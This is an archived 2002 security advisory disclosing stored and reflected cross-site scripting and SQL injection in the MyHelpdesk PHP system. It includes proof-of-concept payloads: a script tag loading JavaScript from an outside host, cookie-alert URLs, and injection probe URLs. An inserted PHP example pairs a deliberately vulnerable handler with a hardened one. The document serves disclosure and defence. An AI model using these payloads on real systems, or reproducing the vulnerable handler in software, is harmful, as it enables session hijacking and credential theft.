Date: 10 Jun 2002 11:50:47 -0000
From: Ahmet Sabri ALPER <[email protected]>
To: [email protected]
Subject: [ARL02-A15] Multiple Security Issues in MyHelpdesk
+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A15 ----/----------/+
+/-----------\----- [email protected] ---/-----------/+
Advisory Information
--------------------
Name : Multiple Security Issues in MyHelpdesk
Software Package : MyHelpdesk
Vendor Homepage : http://myhelpdesk.sourceforge.net/
Vulnerable Versions: v20020509 and older
Platforms : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted : 01/06/2002
Vendor Replied : 02/06/2002
Prior Problems : N/A
Current Version : v20020509 (vulnerable)
Summary
-------
MyHelpdesk is a PHP/MySQL Helpdesk system based on the
OneOrZero Helpdesk but with a different set of features.
The system is appropriate for the Support Desk of small
organizations.
Multiple Cross Site Scripting and SQL injection problems
exist within "MyHelpdesk".
Details
-------
1. When a support assistant creates a new ticket, the Title
and Description input is stored without any filtering or output
encoding. Script placed there runs in the browser of every
supporter or administrator who later views the ticket (stored
Cross Site Scripting), so a suitably crafted payload can hand
any supporter the administrator's session or password if the
issue is exploited correctly.
Proof-of-concept input for the Title and/or Description fields:
<script src="http://forum.olympos.org/f.js">Alper</script>
2. Maliciously crafted links from third party sites may allow
reflected Cross Site Scripting attacks, because the "id"
parameter is reflected into the page unescaped. This can be
accomplished via three different functions of index.php:
http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert(document.cookie)</script>
3. The update text entered when a ticket is edited is likewise
not filtered and may carry malicious code, giving the same
stored Cross Site Scripting as in item 1.
4. Three different functions of index.php pass the "id"
parameter directly into the SQL query without validation. This
makes it possible for attackers to launch SQL injection attacks;
the harmless non-numeric values below are enough to show that
the input reaches the query unmodified:
http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me
Solution
--------
The vendor stated in his reply that MyHelpdesk was
designed for internal use in small organizations, and
that such issues would not do much harm on internal
systems. No fixed version is available at the time of
writing.
Workaround:
Filter the $id, $title and $description variables for
malicious code.
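The workaround above in code, as an added example that is not part of this advisory or of MyHelpdesk itself: a detailticket-style handler written with the unfiltered pattern described in items 1, 2 and 4, next to a hardened version. The PDO connection $db, the table "tickets" with its columns, and the helper names safe_id() and e() are assumptions; the advisory gives no source.

```php
<?php
// Added illustration for the advisory's workaround; not code from MyHelpdesk.
// Assumptions: a PDO connection in $db, a table "tickets" with an integer
// primary key "id" and text columns "title" and "description". The real
// schema and handler names are not given in the advisory.

// Vulnerable pattern as the advisory describes it: the "id" query parameter
// goes straight into SQL (item 4) and straight back into the page (item 2),
// and the stored title/description are echoed unescaped (items 1 and 3).
function detail_ticket_vulnerable(PDO $db, string $id): string
{
    $row = $db->query("SELECT title, description FROM tickets WHERE id = $id")->fetch();
    if ($row === false) {
        return "No ticket with id $id";                                  // reflected XSS
    }
    return "<h1>{$row['title']}</h1><p>{$row['description']}</p>";      // stored XSS
}

// Accept only a positive decimal integer; anything else ("root me",
// "<script>...") is rejected before it reaches SQL or HTML.
function safe_id(string $id): ?int
{
    return (ctype_digit($id) && (int)$id > 0) ? (int)$id : null;
}

// Escape on output; a stored <script> tag renders as literal text.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function detail_ticket_hardened(PDO $db, string $rawId): string
{
    $id = safe_id($rawId);
    if ($id === null) {
        http_response_code(400);
        return 'Invalid ticket id: ' . e($rawId);   // escaped even on the error path
    }
    // Bind the value instead of interpolating it into the query text.
    $stmt = $db->prepare('SELECT title, description FROM tickets WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return "No ticket with id $id";              // $id is an int here, safe to echo
    }
    return '<h1>' . e($row['title']) . '</h1><p>' . e($row['description']) . '</p>';
}

// The same two rules apply to tickettime, ticketfiles, editticket and
// updateticketlog: validate $id with safe_id() before the query, and pass
// every stored string (title, description, update text) through e() when
// rendering it.
```

Filtering the stored fields on the way in, as the workaround suggests, is an acceptable stop-gap, but escaping at output time is what stops the stored cases regardless of where the text came from, and an integer check plus a bound parameter removes the injection outright instead of relying on a blacklist of "malicious code".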
Credits
-------
Discovered on 01 June 2002 by
Ahmet Sabri ALPER <[email protected]>
ALPER Research Labs.
The ALPER Research Labs. [ARL] workers are freelance
security professionals and WhiteHat hackers. The ARL
workers are available for hire for legal jobs.
The ARL also supports the Open Software Community by detecting
possible security issues in GPL or other publicly licensed
products.
References
----------
Product Web Page: http://myhelpdesk.sourceforge.net/
Olympos: http://www.olympos.org/